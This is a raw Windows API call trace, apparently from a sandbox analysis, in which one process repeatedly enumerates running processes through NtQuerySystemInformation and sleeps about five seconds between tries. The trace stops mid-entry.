NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.548] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.577] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.621] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.630] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.640] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.650] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.660] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.681] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.691] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.720] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.740] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.751] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.761] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.782] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 